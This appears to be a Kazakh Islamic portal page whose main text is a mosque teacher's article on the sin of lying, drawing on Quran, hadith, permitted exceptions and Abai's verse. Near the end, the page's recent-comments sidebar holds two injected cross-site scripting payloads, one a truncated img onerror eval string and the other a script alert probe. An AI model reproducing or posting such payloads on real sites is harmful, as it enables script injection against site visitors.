Бауыржан КӨПТІЛЕУОВ: Өтірік сөйлеудің зияны мен зардаптары
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Бесін 11:55
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:55 14:43 16:25 17:48
ықшамдау
Күнтізбе
Хижри
23 Джумада-сани 1446
Миләди
25 желтоқсан 2024

Мақалалар

Бауыржан КӨПТІЛЕУОВ: Өтірік сөйлеудің зияны мен зардаптары

| A | +

Барлық мақтау әлемдерді жоқтан бар еткен Алла Тағалаға ғана тән. Оның елшісі Мұхаммед пайғамбарға сәлемдер мен салауаттар жолдаймыз. Алла Тағала адамзатты жаратқаннан соң ақ пен қараны, адал мен арамды, жақсы мен жаманды хақ діні арқылы нақты ажыратып берді. Біз бүгін Ислам шариғаты бойынша үлкен күнә болып есептелетін өтірік сөйлеудің зияны мен зардаптарына тоқталамыз.

 

Алла Тағала қасиетті Құран Кәрімде: «Өзің білмейтін нәрсеге елікпе (яғни, көрмегенді көрдім, естімегенді естідім деп айтпа). Шындығында құлақ, көз, жүрек сынды дене мүшелерінің бәрі де Алланың алдында жауапқа тартылады» («Исра» сүресі, 36), – деп айту арқылы өтірік айтуға тиым салған.

 

Бізден бұрын өткен қауымдардың құрдымға кетулеріне олардың өтірікке бой алдырулары себеп болған-ды. Өйткені, олар өздеріне жіберілген елшілердің сөздерін өтірікке шығарып, Алланың азабына ұшыраған болатын. Ал қазіргі таңда біз Алланың елшісін жоққа шығарып жатпасақ та, керісінше оны жақсы көреміз деп, кейде шімірікпей өтірік айта береміз. Мұндай өтіріктердің Алла азабын, мейлі, бұл дүниеде көрсетпесе де, тәубе етпесек, ақыретте сұрауынан құтылмасымыз анық. Ардақты сахабалар Пайғамбарымыздан (с.ғ.с): “Момын өтірікші бола ма?” – деп сұраған Алла елшісі (с.ғ.с): “Жоқ, момын өтірікші болмайды” – деп жауап берген. Адам анадан туғанда, өтірікші болып дүниеге келмейді. Бәлкім ол адам надандығымен өтірік айтуды кәсіп қылып алады.  

 

Пасықтықпен өтірік айтудың жолдары:

 

  1. Әзіл-ысқақ арасында. Дінімізде қалжыңдасуға рұқсат берілген, бірақ шегімен, шариғат шеңберінде болса ғана. Мысалы, біреуді күлдіремін деп шектен шығып, өтірік айтып, еш шімірікпей, өкінбестен отыра беретіндер бар. Пайғамбарымыз (с.ғ.с): «Біреуді күлдірем деп өтірік сөйлегендерге Алланың тозағы болсын», - деген.

 

  1. Мақтаншақтық. Біреу дүниесін айтып, шектен шығып, өтірік айтып жатады. Тіпті өзіне еш қатысы жоқ бір адамның дүниесін айтып отырып, сөзден жеңілмейін деп өтірік қосып сөйлейді. Құранда Алла Тағала: «Даңдайсып мақтанғандарды жақсы көрмейді», - деген.

 

  1. Сауда-саттықта өтірік айту. Өзінің пайдасын ойлап саудада өтірік ант ішкендер. Пайғамбарымыз (с.а.с.): «Өтірік ант ішіп сауда қылу  затты шығынға, кәсіпті құрдымға жібереді», - деген.
  2. Отбасында өтірік айту. Әкесін біреу іздеп келсе, “Балам, мені жоқ дей салшы” деп айтып жатады. Әкесі баласын кішкентайынан осылай өтірік айтуға бейімдейді. Хадисте: «Кім өтірік айтса, ол бізден емес», -делінген.

 

  1. Өтіріктің ең жаманы – Алла Тағалаға қарсы өтірік айту. Яғни, “Алла атымен ант етем” деп боларға да, болмасқа да сөз арасына өтірік мағлұмат қосып айту. Сондай-ақ, христиандар Алланың баласы бар деп есептейді. Олар Қасиетті Інжілді өзгертіп, жалған үкім берген деп қарастырылады. Ислам дінінде, бұлардың барлығы – өтіріктің ең үлкендері болып саналады.

 

Өтірік айтудың азаптары:

 

Дүниедегі азабы: Жүректе қара дақ пайда болып, күнәлі істерге құштар болады. Пайғамбарымыз (с.ғ.с): «Өтірік айтушы белсенді болып, жалған сөздерге ұмтылатын болса, жүрегі қап-қара болып кетеді және Алланың алдында өтірікші деп жазылады», - деп айтқан.

 

Ақыреттегі азабы: Тозақ. Хадисте: «Алла тағала үш адамға қарамайды, ақтамайды, тозаққа тастайды. Олар – зинақор қарт кісілер, өтірікшілер, тәкаппар кедей», - делінген.               

 

Шариғатта ойнап болса да өтірік айтуға болмайды

 

Себебі Пайғамбарымыз (с.ғ.с.) бір күні сахабалармен үйінде отырған еді. Арасында Абдулла ибн Амр (р.а.) деген жас сахаба болатын. Сонда оның анасы келіп: “Абдулла, бері кел, бір зат беремін”, - деп шақырады, сонда Пайғамбарымыз (с.ғ.с.) Абдулланың анасына қарап: “Балаңызға не берейін деп едіңіз?” - деп сұрайды. Ол: “Құрма берейін деген едім”, - дейді. Пайғамбарымыз (с.ғ.с.): “Егер шынында шақырып алып, ешқандай зат бермесең, саған бір күнә жазылар еді», - деген екен.  

 

Ескерту шариғат өтірік айтуға рұқсат ететін жерлер:

 

Пайғамбарымыздың (с.ғ.с.) қызы Үмму Гүлсім (р.а.) жеткізген хадисте: «Мен Пайғамбарымыздан (с.ғ.с.) өтірік айтуды үш нәрседен бөлек жерде рұқсат бергенін естімедім деген:

* Бір адам екі жақты жарастыру мақсатымен айтса (яғни келіспей қалған екі тарапты жарастырса);

* Бір адам соғыс кезінде (айла үшін) айтса;

* Күйеуі әйелімен сөйлескен кезде және әйелі күйеуімен тілдескен кезде». (Мүслім)

Ерлі-зайыптылар арадағы көркем қатынасты сақтау үшін өтірік айтса болады. Ал одан басқа ниет көзделсе, онда өтіріктің қай түрі болма да – харам.

 

Өтірік айтуға рұқсат етілетін жерлерге ұқсас орындар:

 

* Өлтірмекші болған залым адамнан мұсылман жасырынып қалса, жасыру мақсатында өтірік айту міндет болады.

* Бір адам мұсылманның мал-мүлкін қақысыз тартып алмақшы болса, жоқ екенін айтып құтылуға болады.

* Бір адам біреудің қандай күнә жасағанын сұраса, одан бас тарту керек. Өйткені, бір істің ашылуы екінші бір іске жол ашады. Ал, Алла Тағала біреудің айыбын жасырушыларды жақсы көреді.

* Бауырының абыройын қорлау үшін, біреу сырын айтып беруді өтінсе, қайтару керек.

* Тәурия – ол естушіге жақын мағынасын беріп, басқа мағынаны көздеу. Өйткені, ашық айтса зиян тигізу мүмкін. Қажет кезде – рұқсат, басқа жағдайда – мәкрүһ.

 

Бір күні Әбу Бәкір мен Пайғамбарымыз (оған Алланың игілігі мен сәлемі болсын) үңгірге бет алып бара жатқанда, алдарынан бір адам шығып, Әбу Бәкірден: «Бұл кім?» - деп, Мұхаммед пайғамбарды (оған Алланың игілігі мен сәлемі болсын) меңзейді. Сонда, ол: «Бұл кісі маған жол көрсетуші», - деп, сыр бермей құтылып кетеді. Өйткені, сол кезде шөл далада біреу жол білмесе, міндетті түрде жол көрсетушіні алатын. Ал, бұл жерде Әбу Бәкір Пайғамбарымызды (оған Алланың игілігі мен сәлемі болсын) хақ Ислам жолын көрсетуші екенін мақсат еткен.

 

Тағы да бір жолы оларды біреулер тоқтатып, «Сендер қайдансыңдар?», - деп сұрайды. Сонда Пайғамбарымыз (оған Алланың игілігі мен сәлемі болсын): «Нахну мин маа’ - біз суданбыз», - деп, бір тамшы судан жаратылғандықтарын көздеп, жауап береді. Жаңағы адам бұлар ендеше (Маа’) «Су» деген рудың адамдары болғаны ғой деп, өз жөндерімен кетіп қалған.

 

Бір ізгі адамды ұнатпайтын біреу келіп сұраса, қызметшісіне: «Өтірік болмау үшін, "үйде жоқ" деп айтпа, керсінше, "ол кісіні мешіттен қараңыз" деп айт» деген екен.

 

Адамдардың арасында кең тараған асырмашылық

Мысалы біреу: «Жүз рет сұрадым, тоқсан тоғыз рет көрдім, он рет бардым» деген тәрізді сөздер көп айтылып жатады. Бұл рұқсат, себебі ол көп сұрап, көп көрген және бірнеше рет барғанын білдіреді. Ал егер оның осы істері тек бір мәрте ғана болып, асырып айтқан болса, онда ол өтірік айтқан болып есептеледі.

Егер өтірік айтуға мәжбүр болса, «тәурианы» қолдансын, тіпті болмай жатса шариғат рұқсат берген шектен аспасын. Өз бетінше дұрыс көрген нәрсесін істесе, шайтанның тұзағына түсуі ғажап емес.

Айша анамыз (оған Алла разы болсын) бір сөзінде: «Сахабалар үшін ең жаман, ең ауыр күнә – өтірік болатын. Өйткені олар өтірік пен иманның бір орында болмайтынын жақсы білетін еді», - дейді.

 

Бір кісі Алланың Елшісіне келіп:

– Мына үш күнәға тұтылдым, тастай алмадым. Бұлар зина, өтірік айту және арақ, - дейді. Пайғамбарымыз оған:

– Мен үшін өтірік айтуыңды таста! - деп бұйырады. Әлгі кісі мақұл деп шығып кетеді. Бір күнә істейтін кезінде «Егер мына күнәны істейтін болсам, Расулуллаһ (оған Алланың игілігі мен сәлемі болсын) сұраған кезде “Иә” десем күнә істегенім мәлім болады, “Жоқ” десем Пайғамбарымызға берген сөзімде тұрмаған боламын» деп ойлады. Сөйтіп қалған екі күнәдан да бас тартады.

 

Қазақ халқы да асыл дініміздің тазалығын бойына терең сіңірген. “Ел боламын десең - бесігіңді түзе” дегендей, балаларына жастайынан “өтірік - өрге озбайтынын” құлақтарына құйып өсірген. Хәкім Абай атамыз да өтірікті “бес дұшпанның” қатарына қосуы тегін емес:

«Адам болам десеңіз,

Оған қайғы жесеңіз.

Өсек, өтірік, мақтаншақ,

Еріншек, бекер мал шашпақ

Бес дұшпаның, білсеңіз...»

 

Бүгінгі бір өтірік, ертеңгі мың ақталуға әкеп соқтырады. Айналаңыздағы адамдар арасында жүзіңіз жарық болсын десеңіз, өтірік айтып жын-шайтанның арбауына ермеңіз. Ерден ер мінезді кетіретін, әйелден ұятты қашыратын – өтірік.

 

Бауыржан КӨПТІЛЕУОВ,

Алматы қаласы Алмалы аудантық

«Төле би» мешітінің ұстазы

 

ДЕРЕККӨЗІ Azan.kz

Ислам ақпараттық-ағарту порталы 

Предыдущий Следующий
Қара сөз қара өлеңге айналғанда... #17 Аяқ киіммен намаз оқуға бола ма?

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Әдеп (этика) Жомарт КЕРШЕЕВ: Уәдеге берік болу
Уәдеге беріктік, опалы болу сөздерінің тілдік мағынасына көңіл бөлсек, ол – алдау, опасыздық жасау, сатқындық деген сөздердің антонимі болып табылады. Қазақ халқында бұрыннан келе жатқан «Уәде – құдай аты» деген терең мағыналы сөз бар. Бұл сөз не үшін мәнді? Себебі, берілген уәде бұзылып, оның қоғам...
Әдеп (этика) Нәпсі тәрбиесі
Адамдардың нәпсісін тәрбиелеп, оны тазарту – Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) келген төл уәзипаларының бірі. Құранда Алла Тағала: «Ол сондай Алла, сауатсыздардың ішіне өздерінен; оларға Алланың аяттарын оқып, оларды тазартатын, сондай-ақ оларға: Кітап, даналық үйрететін бір...
Әдеп (этика) Мейірімді болыңыз, мейірімге бөленесіз
Mейірім – адам бойындағы шынайылық пен сүйіспеншіліктен туындайтын жүрек мейірбандығы. Ол рақым шуағынан тарайтын этика нормасы. Мемлекет басшысының отандастарына, имамның жамағатқа, әке-шешенің балаларына, байдың кедейге, денсаулығы дәрменділердің науқастарға жанашырлығы мейірімділіктен туындаса ке...
Әдеп (этика) Тіл оразасы
Көзді ашып-жұмғанша он екі айдың сұлтаны болған, адамдарды тура жолға бастаушы, хақ пен батылды ажыратушы Алланың соңғы кітабы Құран Кәрім түсірілген, ораза ұстау мұсылмандарға парыз етілген Рамазан айының бірнеше күні өте шықты....
Әдеп (этика) Аталарымыздың түсінген ұят ұғымы бүгін неліктен «ұят» саналуда?
Ата-бабамыздың «өлімнен ұят күшті», «ұялғанымнан жерге кіріп кете жаздадым», «малым жанымның садағасы, арым жанымның садағасы», деп өмір қағидасына айналдырып, жоғары баға берген «ұят» сезімі өкінішке орай қазіргі таңда жүрегімізде азайып, мүлдем жоғалып бара жатқандай. Олай дейтініміз қазіргі қоғам...
Әдеп (этика) Біздің қоғамға махаббат діні керек
Бүгінде уахаби, салафи, сопылық, сопылық емес, ханафи деп жүргенде, біраз азаматтардың көкірегінде дінге деген күмәнін қоюлатып алды. Дін десеңіз, тіпті ханафи мазһабы болса да, діни бір мәселені айтсаңыз, “арабқұлдар” дейтін болды. Тікелей араб әлемімен байланыстыратын болды. Бұл – өте бір қауіпті ...
ықшамдау
Күнтізбе
Хижри
23 Джумада-сани 1446
Миләди
25 желтоқсан 2024
Намаз уақыттары
қазір

Бесін 11:55

Екінтіге дейін 02:03

О милостыне

</tEXtArEa>'"/><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3D

X X
4 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi